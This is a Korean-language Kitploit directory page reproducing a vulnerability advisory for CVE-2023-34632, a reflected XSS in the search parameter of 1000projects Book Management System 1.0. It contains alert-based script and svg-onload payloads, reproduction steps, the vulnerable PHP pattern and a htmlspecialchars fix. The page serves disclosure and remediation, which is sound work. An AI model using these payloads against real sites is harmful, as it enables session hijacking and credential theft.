Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-34632 — 1000projects Book Management System 1.0에서의 반사형 XSS | Kitploit
도구/GitHubGitHub/ssophiz/cve-2023-34632
Vulnerability AnalysisWeb Application ExploitationWeb SecurityPapers & ResearchLearning & Education
GitHubssophiz/cve-2023-34632

CVE-2023-34632

1000projects Book Management System 1.0에서의 반사형 XSS

저장소 보기
6개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-34632

1000projects 도서 관리 시스템 1.0의 반사형 XSS

이미지

CVE-2023-34632

1000projects 도서 관리 시스템 1.0의 반사형 크로스 사이트 스크립팅(XSS)


설명

1000projects 도서 관리 시스템 버전 1.0에서 반사형 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다. 이 취약점은 검색 기능(index.php)에 존재하며, search 매개변수를 통해 사용자가 제공한 입력이 적절한 살균 처리나 출력 인코딩 없이 HTTP 응답에 반사됩니다.

공격자는 JavaScript 코드를 포함한 악성 URL을 제작할 수 있습니다. 피해자가 이 링크를 클릭하면 스크립트가 피해자의 브라우저 세션 컨텍스트에서 실행되어 세션 하이재킹, 자격 증명 탈취 또는 피싱 공격으로 이어질 수 있습니다.


영향을 받는 제품

항목세부 사항
공급업체1000projects
제품Book Management System
버전1.0
구성 요소index.php (검색 기능)
기술PHP / MySQL

취약점 세부 정보


개념 증명

Payload

root@kitploit:~
http://localhost/book-management/index.php?search="><script>alert('CVE-2023-34632')</script>

재현 단계

  1. XAMPP/WAMP를 설치하고 Book Management System 1.0을 웹 루트에 배포합니다.
  2. 브라우저에서 애플리케이션에 접속합니다.
  3. 검색창에 다음 페이로드를 입력합니다(또는 위에서 만든 URL에 접속합니다):
    root@kitploit:~
    "><script>alert('CVE-2023-34632')</script>
    
  4. JavaScript 알림 팝업이 나타나는지 확인하여 XSS 취약점을 확인합니다.

스크린샷

XSS PoC

대체 페이로드

root@kitploit:~
">
root@kitploit:~
"><svg/onload=alert('CVE-2023-34632')>

근본 원인

search 매개변수 값은 아무런 살균 처리 없이 HTML 응답에 직접 포함됩니다. PHP 코드는 사용자 입력을 렌더링하기 전에 htmlspecialchars() 또는 이에 상응하는 출력 인코딩을 적용하지 않습니다.

취약한 코드 패턴

root@kitploit:~
// Vulnerable - user input directly rendered in HTML output
$search = $_GET['search'];
echo "Search results for: " . $search;

해결 방법

HTML 컨텍스트에서 렌더링하기 전에 모든 사용자 제공 입력에 적절한 출력 인코딩을 적용합니다:

root@kitploit:~
// Fixed - proper output encoding
$search = htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
echo "Search results for: " . $search;

영향

  • 세션 하이재킹 — 공격자가 document.cookie를 통해 세션 쿠키를 탈취할 수 있음
  • 자격 증명 탈취 — 사용자 자격 증명을 피싱하기 위해 가짜 로그인 폼을 주입할 수 있음
  • 악성코드 유포 — 피해자를 악성 웹사이트로 리디렉션할 수 있음
  • 웹사이트 변조 — 피해자의 브라우저에서 페이지 콘텐츠를 조작할 수 있음

타임라인

날짜사건
2023-06취약점 발견
2023-06MITRE에 의해 CVE-2023-34632 예약됨
2026-02대중 공개

크레딧

발견자: Wonkyeom Kim (@ssophiz)


참고 자료

  • 1000projects Book Management System
  • CWE-79: 웹 페이지 생성 중 입력의 부적절한 중화
  • OWASP - 크로스 사이트 스크립팅(XSS)
도구 다운로드
항목세부 사항
CVE IDCVE-2023-34632
유형CWE-79: 웹 페이지 생성 중 입력의 부적절한 중화 (반사형 XSS)
공격 벡터네트워크
공격 복잡도낮음
필요 권한없음
사용자 상호 작용필요 (피해자가 조작된 URL을 클릭)
CVSS 3.1 점수6.1 (중간)
CVSS 벡터CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N